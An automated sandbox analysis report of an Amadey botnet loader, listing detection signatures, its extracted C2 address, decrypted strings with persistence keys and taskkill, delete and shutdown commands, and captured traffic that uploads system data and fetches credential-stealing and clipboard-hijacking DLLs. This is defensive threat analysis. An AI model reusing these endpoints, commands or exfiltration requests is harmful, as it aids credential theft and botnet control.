Windows Analysis Report
c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe

Overview

General Information

Sample name: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe
Analysis ID: 1427773
MD5: f6ee2a295cd2ba584f9a363ade3d55b3
SHA1: c6966445c9adf9a0afe1a62b91d1e4f75c5ac55c
SHA256: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e725afb702ec29e705d1f3
Tags: Amadeyexe
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Avira: detected
Found malware configuration
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/8bjndDcoA3/index.php", "Version": "4.19"}
Multi AV Scanner detection for domain / URL
Source: topgamecheats.dev Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?wal=1 Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpd Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1 Virustotal: Detection: 22% Perma Link
Source: topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpm Virustotal: Detection: 22% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Virustotal: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Virustotal: Detection: 46% Perma Link
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Virustotal: Detection: 77% Perma Link
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Virustotal: Detection: 46% Perma Link
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Virustotal: Detection: 42% Perma Link
Multi AV Scanner detection for submitted file
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe ReversingLabs: Detection: 78%
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Virustotal: Detection: 77% Perma Link
Machine Learning detection for sample
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: topgamecheats.dev
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: /8bjndDcoA3/index.php
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: S-%lu-
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: cbb1d94791
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Dctooux.exe
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Startup
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: cmd /C RMDIR /s/q
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: rundll32
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Programs
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: %USERPROFILE%
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: cred.dll|clip.dll|
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: http://
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: https://
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: /Plugins/
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: &unit=
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: shell32.dll
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: kernel32.dll
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: GetNativeSystemInfo
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ProgramData\
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: AVAST Software
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Kaspersky Lab
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Panda Security
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Doctor Web
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: 360TotalSecurity
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Bitdefender
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Norton
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Sophos
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Comodo
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: WinDefender
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: 0123456789
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ------
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ?scr=1
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ComputerName
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: -unicode-
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: VideoID
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: DefaultSettings.XResolution
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: DefaultSettings.YResolution
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ProductName
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: CurrentBuild
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: rundll32.exe
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: "taskkill /f /im "
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: " && timeout 1 && del
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: && Exit"
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: " && ren
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Powershell.exe
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: shutdown -s -t 0
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: random
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ~L$v(g
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ~L$v(g
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: 7FKeuO

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Unpacked PE file: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Uses 32bit PE files
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.28.dr, cred64[1].dll.28.dr
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_e07fb967fe61390ff947874da9a18efae6cac7_8e61c4a5_95ca67f7-278d-440f-920c-862f52c2b333\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_f9165ae4ce682ce742d9caa30eddae375d89b91_8e61c4a5_199673d7-74d3-4533-ae8f-04d3f7d3cc65\

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49746 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49748 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49751 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49752 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49755 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49762 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49765 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49783 -> 93.123.39.96:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: topgamecheats.dev/8bjndDcoA3/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Fri, 12 Apr 2024 22:39:08 GMTetag: "6619b80c-139c00"accept-ranges: bytescontent-length: 1285120date: Thu, 18 Apr 2024 04:53:14 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 db 8d 19 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 bc 0f 00 00 54 04 00 00 00 00 00 c8 00 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 89 12 00 58 00 00 00 98 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 70 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 d0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 ba 0f 00 00 10 00 00 00 bc 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 ce 02 00 00 d0 0f 00 00 d0 02 00 00 c0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac bb 00 00 00 a0 12 00 00 44 00 00 00 90 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 70 ad 00 00 00 60 13 00 00 ae 00 00 00 d4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 82 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Fri, 12 Apr 2024 22:39:08 GMTetag: "6619b80c-1b600"accept-ranges: bytescontent-length: 112128date: Thu, 18 Apr 2024 04:53:18 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 dd 8d 19 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 a0 01 00 9c 00 00 00 cc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 00 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
